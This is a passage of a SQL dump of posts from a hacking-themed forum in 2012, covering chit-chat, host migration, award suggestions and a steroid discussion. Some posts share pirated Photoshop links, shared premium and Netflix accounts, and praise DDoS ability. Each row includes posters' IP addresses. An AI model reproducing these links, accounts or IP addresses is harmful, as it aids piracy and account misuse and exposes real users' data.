'784', '42', 'RE: Lance armstrong stripped of 7 tour titles?', '0', '82', 'iTzIpod', '1345831436', '[quote=\'NXK\' pid=\'784\' dateline=\'1345829671\']\r\n[quote=\'iTzIpod\' pid=\'760\' dateline=\'1345820478\']\r\n[quote=\'t3h jok3r\' pid=\'757\' dateline=\'1345819163\']\r\nToo much to read but I got the Idea. I\'m sure 90% athletes do drugs (Ex: Steroids) or some other kind to get more energy to cheat.\r\n[/quote]\r\n\r\nAgreed. All I wanna know is how they don\'t get caught :3\r\n[/quote]\r\n\r\nCertain steroids can be flushed from your system fast, It just depends how fast the athlete needs them out of his system.\r\n\r\nit just depends what kind of steroid the\'re using.\r\n[/quote]\r\n\r\nOh. I didn\'t know that. :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '16b759569484620a1188ba105bdf32b6', '0', '0'); INSERT INTO mybb_posts VALUES('790', '197', '696', '56', 'RE: /me Thread', '0', '53', 'sirchamp', '1345831543', '/me thinks this is a spam thread', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '07842525e648323d7cd6647547776e27', '0', '0'); INSERT INTO mybb_posts VALUES('791', '205', '778', '53', 'RE: First Java Multiplayer \"Game\"', '0', '67', 'HoverCatz', '1345833072', '[quote=\'Apathy\' pid=\'778\' dateline=\'1345826081\']\r\nLooks nice have not downloaded it though. What do you do in it...\r\n[/quote]\r\n\r\n[quote]\r\nonly Movement works\r\n[/quote]\r\n\r\nIts still under development', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'b798b6e5e163fa65f288c29f8601f090', '0', '0'); INSERT INTO mybb_posts VALUES('792', '204', '741', '29', 'RE: [FREE]Skype Resolver API', '0', '62', 'R?????zo?', '1345833868', 'I\'d love this, can I get it.\nThanks in advance.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'f1ef193f0b3183ffaf302d5746cb4baa', '0', '0'); INSERT INTO mybb_posts VALUES('793', '204', '741', '29', 'RE: [FREE]Skype Resolver API', '0', '67', 'HoverCatz', '1345835031', 'API Is down now O.o \"fuck No Posting Private Shit of mine - Blic API BANNED - Arron XR\"', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'ac46ab3ab3acea29ec1caf022d9406c9', '0', '0'); INSERT INTO mybb_posts VALUES('794', '208', '788', '7', 'RE: I m feeling happy ;)', '0', '82', 'iTzIpod', '1345836146', 'Your post is censored .', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '89783dc9bc285b1e3a583a13056d0ac9', '0', '0'); INSERT INTO mybb_posts VALUES('795', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1345836210', '/me corrects sirchamp by explaining to him it is a Forum Game.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '25b40a0a3f9c81afe870744eb074ebe3', '0', '0'); INSERT INTO mybb_posts VALUES('796', '197', '696', '56', 'RE: /me Thread', '0', '53', 'sirchamp', '1345838234', '/me wants to say sorry because sirchamp didnt realize it is a forum game', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'f2cf1c4fce3edee946e0034eba2af405', '0', '0'); INSERT INTO mybb_posts VALUES('797', '197', '696', '56', 'RE: /me Thread', '0', '67', 'HoverCatz', '1345845701', '/me feels funny :3', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'db3fed2c30139d0d6c1e5938f2cb2ad8', '0', '0'); INSERT INTO mybb_posts VALUES('798', '179', '593', '34', 'RE: [tut] Multiple 3D text tutorials', '0', '67', 'HoverCatz', '1345845786', 'Thanks :D Nice release :3', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'a12d47bb6d2bf17d58e104e7a4452327', '0', '0'); INSERT INTO mybb_posts VALUES('799', '197', '696', '56', 'RE: /me Thread', '0', '55', 'Baws', '1345845907', '/me is Baws the Baws.\n\n/me is botting on runescape.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'f28e149736f740bf1bac65818f6b157f', '0', '0'); INSERT INTO mybb_posts VALUES('800', '43', '105', '7', 'RE: How did you find us?', '0', '55', 'Baws', '1345846136', 'I saw on another forum and I got here. :)', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'dd8d6b64371a32b8d438b0af93acd17a', '0', '0'); INSERT INTO mybb_posts VALUES('801', '187', '640', '3', 'RE: Public Downloads?', '0', '55', 'Baws', '1345846201', 'Like have been suggested, you should do a plugin that is \"post in thread to unlock file\"', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'bf4be29b231ae1e9b5489a1420aa1362', '0', '0'); INSERT INTO mybb_posts VALUES('802', '181', '605', '54', 'RE: Fresh 22 Aug HoT [ Brazzers / Mofos / Xhamster / Youjizz .... MorE ] HoT', '0', '55', 'Baws', '1345846258', 'This will come in handy, you naughty admin.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '11c8030f353490bb47f4dacf755ad3ab', '0', '0'); INSERT INTO mybb_posts VALUES('803', '207', '776', '3', 'RE: Suggest awards and apply for awads.', '0', '67', 'HoverCatz', '1345846775', 'Award Name: Cyber Warrior\nAward Description: For those with a powerful DDoSer\nHow to obtain award: Prove to Joker that you can hit down Big stuff\nImage: http://www.veryicon.com/icon/png/Holiday/Christmas%203/star.png (Resize it)', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '0cc956a3c6439b618d7f1173ceabfe8d', '0', '0'); INSERT INTO mybb_posts VALUES('804', '197', '696', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1345847529', '/me I think I\'m doing this right this time.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', 'c91ed34788d7bb333f49f7d553d8f30c', '0', '0'); INSERT INTO mybb_posts VALUES('805', '206', '769', '7', 'RE: Apply for SWAG', '0', '1', 't3h jok3r', '1345847642', 'Nice mask, you been granted the SWAG award. Enjoy.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', '564361a5309e36ee59ae93f8fdb73d90', '0', '0'); INSERT INTO mybb_posts VALUES('806', '187', '640', '3', 'RE: Public Downloads?', '0', '1', 't3h jok3r', '1345847679', 'Sure, I will try coding a plugin. I\'m sure there was a mycode for this though.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', '47e6b113e6cd613c1192919fb7ecf3f9', '0', '0'); INSERT INTO mybb_posts VALUES('807', '196', '767', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '1', 't3h jok3r', '1345847712', '[quote=\'iTzIpod\' pid=\'767\' dateline=\'1345822689\']\r\n[quote=\'t3h jok3r\' pid=\'766\' dateline=\'1345822280\']\r\n[quote=\'iTzIpod\' pid=\'762\' dateline=\'1345821490\']\r\n[quote=\'t3h jok3r\' pid=\'703\' dateline=\'1345768309\']\r\n[quote=\'iTzIpod\' pid=\'701\' dateline=\'1345767787\']\r\n\r\nTrue. But hopefully this new host migration will have better host than this current one. \r\n\r\nBy the way may I ask which host we are currently using?\r\n[/quote]\r\n\r\nSorry I can not say what host we are currently on due to some security reasons. But after the migrating I will surely let you know, my hosting I\'m on now is fairly new and kinda cheap but our new host has been out there for 3+ years with good reviews.\r\n[/quote]\r\n\r\nOh. Alright :) What about this new host? :3\r\n[/quote]\r\n\r\nUmm, it\'s fast and we will migrate before Saturday.\r\n[/quote]\r\n\r\n\r\nCan you tell me what host we are going to use? Or is that a no no?\r\n[/quote]\r\n\r\nSorry I can\'t but I can let you know what hosting we were on.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', '9171b488c81abc707a934dda21bf6e42', '0', '0'); INSERT INTO mybb_posts VALUES('808', '197', '804', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1345847742', '[quote=\'t3h jok3r\' pid=\'804\' dateline=\'1345847529\']\r\n* t3h jok3r I think I\'m doing this right this time.\r\n[/quote]\r\n\r\n/me congratulates t3h jok3r with a pat on the back and a cookie.\r\n\r\n\r\n\r\n\r\n[img]http://upload.wikimedia.org/wikipedia/commons/4/42/Cookie.gif[/img] Here is your cookie!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9dd5b41856cc3367a31e44ba63ba2ea9', '0', '0'); INSERT INTO mybb_posts VALUES('809', '204', '793', '29', 'RE: [FREE]Skype Resolver API', '0', '1', 't3h jok3r', '1345847855', '[quote=\'HoverCatz\' pid=\'793\' dateline=\'1345835031\']\r\nAPI Is down now O.o \"fuck No Posting Private Shit of mine - Blic API BANNED - Arron XR\"\r\n[/quote]\r\n\r\nThe thread layout was Blics but I got the API from Mr. Furioz.\r\n\r\nAnyway, sorry guys I guys the API is down so I\'m going to close this giveaway.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', '4970e307ad98f39f91959aac228320e0', '0', '0'); INSERT INTO mybb_posts VALUES('810', '43', '779', '7', 'RE: How did you find us?', '0', '1', 't3h jok3r', '1345847940', '[quote=\'Apathy\' pid=\'779\' dateline=\'1345826158\']\r\nI helped start it with you... :P\r\n[/quote]\r\n\r\nI remember this part and the time when I introduced you to Reborn. \r\n\r\n\r\n[quote=\'iTzIpod\' pid=\'768\' dateline=\'1345822951\']\r\n[quote=\'t3h jok3r\' pid=\'763\' dateline=\'1345821692\']\r\n[quote=\'iTzIpod\' pid=\'627\' dateline=\'1345668585\']\r\nWhat? What do you mean took my username? :o\r\n[/quote]\r\n\r\nYou said \"I\'m from t3h jok3r\"\r\n[/quote]\r\n\r\nOh. I meant it as in you referred me :3 Since I came from TP. And your username is L33t Hacking on TP.\r\n[/quote]\r\n\r\nLol now I get it ;)', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', 'b453946e87eeee03a9e921325637e1b4', '0', '0'); INSERT INTO mybb_posts VALUES('811', '184', '622', '35', 'RE: [Video] I\'m a video editor!', '0', '1', 't3h jok3r', '1345847969', 'I wish I could view videos :(', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', '013427855dcadca40e5862413b2f0daf', '0', '0'); INSERT INTO mybb_posts VALUES('812', '206', '805', '7', 'RE: Apply for SWAG', '0', '67', 'HoverCatz', '1345848103', '[quote=\'t3h jok3r\' pid=\'805\' dateline=\'1345847642\']\r\nNice mask, you been granted the SWAG award. Enjoy.\r\n[/quote]\r\n\r\nThanks bro :D', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'be474fafdaefe5dcca97473e0743b4d1', '0', '0'); INSERT INTO mybb_posts VALUES('813', '200', '774', '55', 'RE: [Request] Adobe Photoshop CS6 Portable', '0', '82', 'iTzIpod', '1345848127', '[quote=\'Apathy\' pid=\'774\' dateline=\'1345825644\']\r\nTorrent his:\r\n\r\nmagnet:?xt=urn:btih:1F70593D167F733FFB3093673EE86E850525FAB0&dn=Adobe%20Photoshop%20CS6%2013.0%20Multilingual%20%28Portable%29&tr=udp%3a//tracker.openbittorrent.com%3a80\r\n\r\nIt is working and is cs6 portable.\r\n\r\nSeems clean but runs amazingly in sandboxie.\r\n[/quote]\r\nThat\'s one huge link! :o But I will give it a try.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '64a6eac870441c1554edf36a6735b7da', '0', '0'); INSERT INTO mybb_posts VALUES('814', '200', '753', '55', 'RE: [Request] Adobe Photoshop CS6 Portable', '0', '1', 't3h jok3r', '1345848129', '[quote=\'iTzIpod\' pid=\'753\' dateline=\'1345818053\']\r\n[quote=\'t3h jok3r\' pid=\'746\' dateline=\'1345817347\']\r\nhttp://dl.dropbox.com/u/26951938/Photoshop.rar \r\n\r\nIt\'s CS5 though, also It\'s clean. I checked the virus total scan before downloading and the sandbox control panel seems to be OK.\r\n\r\nENJOY!\r\n[/quote]\r\n\r\nIs it Portable? :3 Or just the regular Adobe Photoshop CS5? Or Extended? Etc.\r\n[/quote]\r\n\r\nIt\'s :opps:\r\n\r\nUmmm :thinking:\r\n\r\nPortable I guess cause it\'s basically a zip with a lot of files and the main PS program is in the zip. All you have to do is extract the content and open up PS to start using it.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', '22ef59240700278c81cd88a39ba99feb', '0', '0'); INSERT INTO mybb_posts VALUES('815', '206', '812', '7', 'RE: Apply for SWAG', '0', '1', 't3h jok3r', '1345848187', '[quote=\'HoverCatz\' pid=\'812\' dateline=\'1345848103\']\r\n[quote=\'t3h jok3r\' pid=\'805\' dateline=\'1345847642\']\r\nNice mask, you been granted the SWAG award. Enjoy.\r\n[/quote]\r\n\r\nThanks bro :D\r\n[/quote]\r\n\r\nNo problem. You deserved it after all.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', 'e721b2cbbeba765d9b6dd817a47ddcbc', '0', '0'); INSERT INTO mybb_posts VALUES('816', '181', '605', '54', 'RE: Fresh 22 Aug HoT [ Brazzers / Mofos / Xhamster / Youjizz .... MorE ] HoT', '0', '1', 't3h jok3r', '1345848333', 'But GFrevenge works :D\n\nSorry for the dead links people.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', 'a2eb6a7041ff3dcd3cfc00929a488859', '0', '0'); INSERT INTO mybb_posts VALUES('817', '184', '811', '35', 'RE: [Video] I\'m a video editor!', '0', '82', 'iTzIpod', '1345848351', '[quote=\'t3h jok3r\' pid=\'811\' dateline=\'1345847969\']\r\nI wish I could view videos :(\r\n[/quote]\r\n\r\nIs that because of the slow internet connection?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '60ed78a8221a05966476eda8eb0789be', '0', '0'); INSERT INTO mybb_posts VALUES('818', '201', '784', '42', 'RE: Lance armstrong stripped of 7 tour titles?', '0', '1', 't3h jok3r', '1345848409', '[quote=\'NXK\' pid=\'784\' dateline=\'1345829671\']\r\n[quote=\'iTzIpod\' pid=\'760\' dateline=\'1345820478\']\r\n[quote=\'t3h jok3r\' pid=\'757\' dateline=\'1345819163\']\r\nToo much to read but I got the Idea. I\'m sure 90% athletes do drugs (Ex: Steroids) or some other kind to get more energy to cheat.\r\n[/quote]\r\n\r\nAgreed. All I wanna know is how they don\'t get caught :3\r\n[/quote]\r\n\r\nCertain steroids can be flushed from your system fast, It just depends how fast the athlete needs them out of his system.\r\n\r\nit just depends what kind of steroid they\'re using.\r\n[/quote]\r\n\r\nOh, people please be aware of NXK because he is smarter than me. JK, I honestly didn\'t know that but doesn\'t it slow down your body?', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', 'ddeffbac36ff8d3f4484604b43ff424f', '0', '0'); INSERT INTO mybb_posts VALUES('819', '209', '0', '35', 'Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '82', 'iTzIpod', '1345848449', 'I found this on the interwebs. :p\n\nEnjoy!\n\nClick [url=http://i1270.photobucket.com/albums/jj612/iTzIpod/MozillaFireFoxWallpaper.jpg] Here[/url] to view\n\nTo Download: \n1. Right Click Image\n2. Save Image As...\n3. Locate Image\n4. Set as Desktop Background\n\nPreview\n\n[Spoiler]\n[img]http://i1270.photobucket.com/albums/jj612/iTzIpod/MozillaFireFoxWallpaper.jpg[/img][/Spoiler]', '24.212.197.164', '416597412', '1', '0', '82', '1345848519', '1', '6f4afff943a93ca245334122f0dd2c3e', '0', '1345848519'); INSERT INTO mybb_posts VALUES('820', '208', '794', '7', 'RE: I m feeling happy ;)', '0', '1', 't3h jok3r', '1345848462', '[quote=\'iTzIpod\' pid=\'794\' dateline=\'1345836146\']\r\nYour post is censored .\r\n[/quote]\r\n\r\nThe only word we have censored is HF. So the OP left HF. Thanks Sin Cara for helping out LH.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', 'b8cdb5bcc3e6d25607be5c2cd28a458c', '0', '0'); INSERT INTO mybb_posts VALUES('821', '183', '620', '54', 'RE: 2x PlayBoy Premium', '0', '1', 't3h jok3r', '1345848512', 'So where can I use these logins?', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', 'cf520815dab810d0e1b6d5504ec536b3', '0', '0'); INSERT INTO mybb_posts VALUES('822', '209', '819', '35', 'RE: Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '1', 't3h jok3r', '1345848729', 'Dude, I just downloaded this and set it as my BG and it looks sick. It goes along with my PC now because I have the custom FBI screen with jokers (Batman) picture as user account picture and now my background. \n\nThanks a lot man.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', '57888d0d891dc0e42962fa56a509cd9f', '0', '0'); INSERT INTO mybb_posts VALUES('823', '184', '817', '35', 'RE: [Video] I\'m a video editor!', '0', '1', 't3h jok3r', '1345848802', '[quote=\'iTzIpod\' pid=\'817\' dateline=\'1345848351\']\r\n[quote=\'t3h jok3r\' pid=\'811\' dateline=\'1345847969\']\r\nI wish I could view videos :(\r\n[/quote]\r\n\r\nIs that because of the slow internet connection?\r\n[/quote]\r\n\r\nYup, that\'s correct. I can\'t even watch my favourite TV show, which is prison break.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', '920f7044542032b57f445f16e84af0f5', '0', '0'); INSERT INTO mybb_posts VALUES('824', '183', '620', '54', 'RE: 2x PlayBoy Premium', '0', '112', '??????Z', '1345848947', 'http://www.playboy.com .:)', '92.22.242.209', '1545007825', '0', '0', '0', '0', '1', 'e161b2124a388e972e7c53cb3ff85917', '0', '0'); INSERT INTO mybb_posts VALUES('825', '209', '819', '35', 'RE: Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '82', 'iTzIpod', '1345849379', 'No problem! Just here to help!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '56034fcc501dbb22cdb91f041c85dee7', '0', '0'); INSERT INTO mybb_posts VALUES('826', '184', '823', '35', 'RE: [Video] I\'m a video editor!', '0', '82', 'iTzIpod', '1345849582', '[quote=\'t3h jok3r\' pid=\'823\' dateline=\'1345848802\']\n[quote=\'iTzIpod\' pid=\'817\' dateline=\'1345848351\']\n[quote=\'t3h jok3r\' pid=\'811\' dateline=\'1345847969\']\nI wish I could view videos :(\n[/quote]\n\nIs that because of the slow internet connection?\n[/quote]\n\nYup, that\'s correct. I can\'t even watch my favourite TV show, which is prison break.\n[/quote]\n\nLol I can give you a free Netflix account. You can watch Prison Break on it. Unless that won\'t work? :o', '24.212.197.164', '416597412', '1', '0', '82', '1345849644', '1', '24ca21087652faf15ba404647683741e', '0', '1345849644'); INSERT INTO mybb_posts VALUES('827', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '90', 'duhuh', '1345852212', 'yah first post, would love if you could help with razor? possibly thanks', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', 'c720b020785820fe214d399943651221', '0', '0'); INSERT INTO mybb_posts VALUES('828', '196', '807', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '82', 'iTzIpod', '1345852526', '[quote=\'t3h jok3r\' pid=\'807\' dateline=\'1345847712\']\r\n[quote=\'iTzIpod\' pid=\'767\' dateline=\'1345822689\']\r\n[quote=\'t3h jok3r\' pid=\'766\' dateline=\'1345822280\']\r\n[quote=\'iTzIpod\' pid=\'762\' dateline=\'1345821490\']\r\n[quote=\'t3h jok3r\' pid=\'703\' dateline=\'1345768309\']\r\n\r\nSorry I can not say what host we are currently on due to some security reasons. But after the migrating I will surely let you know, my hosting I\'m on now is fairly new and kinda cheap but our new host has been out there for 3+ years with good reviews.\r\n[/quote]\r\n\r\nOh. Alright :) What about this new host? :3\r\n[/quote]\r\n\r\nUmm, it\'s fast and we will migrate before Saturday.\r\n[/quote]\r\n\r\n\r\nCan you tell me what host we are going to use? Or is that a no no?\r\n[/quote]\r\n\r\nSorry I can\'t but I can let you know what hosting we were on.\r\n[/quote]\r\nAlright. It\'s cool.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c9e47d465ee1029512bdaa61454e1e98', '0', '0'); INSERT INTO mybb_posts VALUES('829', '201', '818', '42', 'RE: Lance armstrong stripped of 7 tour titles?', '0', '61', 'NXK', '1345852575', '[quote=\'t3h jok3r\' pid=\'818\' dateline=\'1345848409\']\r\n[quote=\'NXK\' pid=\'784\' dateline=\'1345829671\']\r\n[quote=\'iTzIpod\' pid=\'760\' dateline=\'1345820478\']\r\n[quote=\'t3h jok3r\' pid=\'757\' dateline=\'1345819163\']\r\nToo much to read but I got the Idea. I\'m sure 90% athletes do drugs (Ex: Steroids) or some other kind to get more energy to cheat.\r\n[/quote]\r\n\r\nAgreed. All I wanna know is how they don\'t get caught :3\r\n[/quote]\r\n\r\nCertain steroids can be flushed from your system fast, It just depends how fast the athlete needs them out of his system.\r\n\r\nit just depends what kind of steroid they\'re using.\r\n[/quote]\r\n\r\nOh, people please be aware of NXK because he is smarter than me. JK, I honestly didn\'t know that but doesn\'t it slow down your body?\r\n[/quote]\r\n\r\nNo it doesn\'t, How they take steroids is alot different than most people think. They go on what\'s called a \"cycle\" which is where they will take there steroid of choice (Theres ton\'s of kinds) And they will only take it for a month time. After a month they stop but keep training. In another 3 months they will repeat the process.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'c36e82c57bf31f7b87f0524e0f5a06d5', '0', '0'); INSERT INTO mybb_posts VALUES('830', '139', '356', '12', 'RE: Get 60 Minutes skype credit FREE!', '0', '90', 'duhuh', '1345852681', 'still down, which is a shame.', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', 'a38d3eca1f03a293b967006b0554acba', '0', '0'); INSERT INTO mybb_posts VALUES('831', '78', '187', '7', 'RE: Dota 2 beta keys giveawat!', '0', '61', 'NXK', '1345852758', 'Dota 2 is a stand alone version of the game dota which was a mod of warcraft 3.\n\nIt\'s a moba style game somewhat like league of legends.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '4d119eeb9acdc024761f87394bf41bde', '0', '0'); INSERT INTO mybb_posts VALUES('832', '43', '810', '7', 'RE: How did you find us?', '0', '82', 'iTzIpod', '1345853213', '[quote=\'t3h jok3r\' pid=\'810\' dateline=\'1345847940\']\r\n[quote=\'Apathy\' pid=\'779\' dateline=\'1345826158\']\r\nI helped start it with you... :P\r\n[/quote]\r\n\r\nI remember this part and the time when I introduced you to Reborn. \r\n\r\n\r\n[quote=\'iTzIpod\' pid=\'768\' dateline=\'1345822951\']\r\n[quote=\'t3h jok3r\' pid=\'763\' dateline=\'1345821692\']\r\n[quote=\'iTzIpod\' pid=\'627\' dateline=\'1345668585\']\r\nWhat? What do you mean took my username? :o\r\n[/quote]\r\n\r\nYou said \"I\'m from t3h jok3r\"\r\n[/quote]\r\n\r\nOh. I meant it as in you referred me :3 Since I came from TP. And your username is L33t Hacking on TP.\r\n[/quote]\r\n\r\nLol now I get it ;)\r\n[/quote]\r\n\r\n\r\nSorry for the mix up =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5132ed393d49f1ae4f05ed21de09c559', '0', '0'); INSERT INTO mybb_posts VALUES('833', '206', '815', '7', 'RE: Apply for SWAG', '0', '82', 'iTzIpod', '1345853367', '[quote=\'t3h jok3r\' pid=\'815\' dateline=\'1345848187\']\r\n[quote=\'HoverCatz\' pid=\'812\' dateline=\'1345848103\']\r\n[quote=\'t3h jok3r\' pid=\'805\' dateline=\'1345847642\']\r\nNice mask, you been granted the SWAG award. Enjoy.\r\n[/quote]\r\n\r\nThanks bro :D\r\n[/quote]\r\n\r\nNo problem. You deserved it after all.\r\n[/quote]\r\n\r\n\r\n\r\nYou gotta post a picture of yourself on the forum looking all swag just to receive the award?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1bfead693d8562d3434aa645e05acbd2', '0', '0'); INSERT INTO mybb_posts VALUES('834', '208', '820', '7', 'RE: I m feeling happy ;)', '0', '82', 'iTzIpod', '1345853440', '[quote=\'t3h jok3r\' pid=\'820\' dateline=\'1345848462\']\r\n[quote=\'iTzIpod\' pid=\'794\' dateline=\'1345836146\']\r\nYour post is censored .\r\n[/quote]\r\n\r\nThe only word we have censored is HF. So the OP left HF. Thanks Sin Cara for helping out LH.\r\n[/quote]\r\n\r\nOh alright. \r\n\r\nCongratulations on leaving that forum!\r\nSo much repfuckers. -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd31a373f07baa6fc8769a61dbe1849d3', '0', '0'); INSERT INTO mybb_posts VALUES('835', '210', '0', '3', 'Moved Successfully!!!', '0', '1', 't3h jok3r', '1345853465', 'L33THacking has moved to a new host successfully. For the first few minutes I wasn\'t able to access the Admin Control Panel but I figured out what I did wrong. \r\n\r\nLH will now load faster, hardly any downtimes and emails will work properly. \r\n\r\nEmails include activation emails and support emails through the contact form. \r\n\r\nI have a lot of edit tonight, hopefully I get done by tomorrow.\r\n\r\nYou could still PM me, I would concentrate more on PMs than edits :D', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', 'f74008b3e236eb27d652a1570ab1d3ee', '0', '0'); INSERT INTO mybb_posts VALUES('836', '196', '693', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '1', 't3h jok3r', '1345853495', 'Please visit the link below for the update on our new host.\n\nhttp://l33thacking.com/showthread.php?tid=210', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', '5706c51501e546b6f7a2bca4e58526f1', '0', '0'); INSERT INTO mybb_posts VALUES('837', '210', '835', '3', 'RE: Moved Successfully!!!', '0', '82', 'iTzIpod', '1345853611', 'Thank God. Woot. Hope this host will be 500x faster.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd661eb2f883d7099cb28f11854820c36', '0', '0'); INSERT INTO mybb_posts VALUES('838', '207', '776', '3', 'RE: Suggest awards and apply for awads.', '0', '1', 't3h jok3r', '1345854491', 'Award Name: Rep Whore\nAward Description: Self-explanatory \nHow to obtain: People in this group have 20 or more positive reps only. No neg or neutrals.\n\nImage: Can it get approved first?', '41.174.60.179', '699284659', '1', '0', '1', '1345854508', '1', '9fff14ca992306d5c3f4dad0ca8b6e9b', '0', '1345854508'); INSERT INTO mybb_posts VALUES('839', '208', '834', '7', 'RE: I m feeling happy ;)', '0', '1', 't3h jok3r', '1345854645', '[quote=\'iTzIpod\' pid=\'834\' dateline=\'1345853440\']\r\n[quote=\'t3h jok3r\' pid=\'820\' dateline=\'1345848462\']\r\n[quote=\'iTzIpod\' pid=\'794\' dateline=\'1345836146\']\r\nYour post is censored .\r\n[/quote]\r\n\r\nThe only word we have censored is HF. So the OP left HF. Thanks Sin Cara for helping out LH.\r\n[/quote]\r\n\r\nOh alright. \r\n\r\nCongratulations on leaving that forum!\r\nSo much repfuckers. -.-\r\n[/quote]\r\n\r\nI agree, I also started hating HF because they have too much dead post here and PM mes and people are lazy to learn real hacking.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', 'd866ddb6fce8f9557a4261f5bbda975f', '0', '0'); INSERT INTO mybb_posts VALUES('840', '139', '356', '12', 'RE: Get 60 Minutes skype credit FREE!', '0', '54', 'Sin Cara', '1345856086', 'Thread is closed due to link down ;)\n\nSorry for the inconvenience!', '119.154.20.73', '2006586441', '1', '0', '0', '0', '1', '8cbc5fc8450ad2e9a2ce1c882d7384d6', '0', '0'); INSERT INTO mybb_posts VALUES('841', '183', '821', '54', 'RE: 2x PlayBoy Premium', '0', '54', 'Sin Cara', '1345856140', '[quote=\'t3h jok3r\' pid=\'821\' dateline=\'1345848512\']\r\nSo where can I use these logins?\r\n[/quote]\r\n\r\n http://www.playboy.com ;)', '119.154.20.73', '2006586441', '1', '0', '0', '0', '1', '94dabc745093f7741eed7b576544d6a4', '0', '0'); INSERT INTO mybb_posts VALUES('842', '208', '788', '7', 'RE: I m feeling happy ;)', '0', '54', 'Sin Cara', '1345856193', 'Thanks every for their feedback ;)', '119.154.20.73', '2006586441', '1', '0', '0', '0', '1', 'fe32ba96c1a57434720dd13d93fd8e79', '0', '0'); INSERT INTO mybb_posts VALUES('843', '207', '776', '3', 'RE: Suggest awards and apply for awads.', '0', '82', 'iTzIpod', '1345856916', 'Award Name: Post Whore\nAward Description: Self-explanatory \nHow to obtain: Obtain 100 Posts. Posts must be HQ. No LQ posts. \n\nImage: http://i.imgur.com/c7vuI.png [img]http://i.imgur.com/c7vuI.png[/img]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '73c4285791601f72bf3e8a355ff441f3', '0', '0'); INSERT INTO mybb_posts VALUES('844', '211', '0', '3', '[Announcement] Marketplace Removed', '0', '82', 'iTzIpod', '1345857526', 'EDIT: Nevermind it was a glitch or bug I think\n\n\nhttp://i.imgur.com/1zCch.png', '24.212.197.164', '416597412', '1', '0', '82', '1345857645', '1', '9d96d6dfec98d9f1e15252e53e5ba5db', '0', '1345857645'); INSERT INTO mybb_posts VALUES('845', '211', '844', '3', 'RE: [Announcement] Marketplace Removed', '0', '1', 't3h jok3r', '1345857966', 'Actually no, it was not a bug or glitch. \n\nI added the groups tab, so had to delete Graphics and Marketplace to add \"Groups\" tab.', '41.174.16.66', '699273282', '1', '0', '1', '1345858301', '1', 'b44b7f2504403e42bc8d90ac881b03d1', '0', '1345858301'); INSERT INTO mybb_posts VALUES('846', '208', '788', '7', 'RE: I m feeling happy ;)', '0', '55', 'Baws', '1345858066', 'I don\'t get why HF is censored, that\'s where I got here from.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'e969836f2da784fa1816966b4e26f463', '0', '0'); INSERT INTO mybb_posts VALUES('847', '211', '844', '3', 'RE: [Announcement] Marketplace Removed', '0', '20', 'JakeUS', '1345858067', 'Not a glitch, it is gone.\n\nEDIT: They are both still here?', '24.59.243.229', '406582245', '1', '0', '20', '1345858133', '1', '839b3d096ea4397c841cf388faab7bdb', '0', '1345858133'); INSERT INTO mybb_posts VALUES('848', '211', '847', '3', 'RE: [Announcement] Marketplace Removed', '0', '1', 't3h jok3r', '1345858239', '[quote=\'JakeUS\' pid=\'847\' dateline=\'1345858067\']\r\nNot a glitch, it is gone.\r\n\r\nEDIT: They are both still here?\r\n[/quote]\r\nCheck my previous post on this thread.', '41.174.16.66', '699273282', '1', '0', '0', '0', '1', '01682e0ca13986563721b57cd92d61cb', '0', '0'); INSERT INTO mybb_posts VALUES('849', '212', '0', '58', 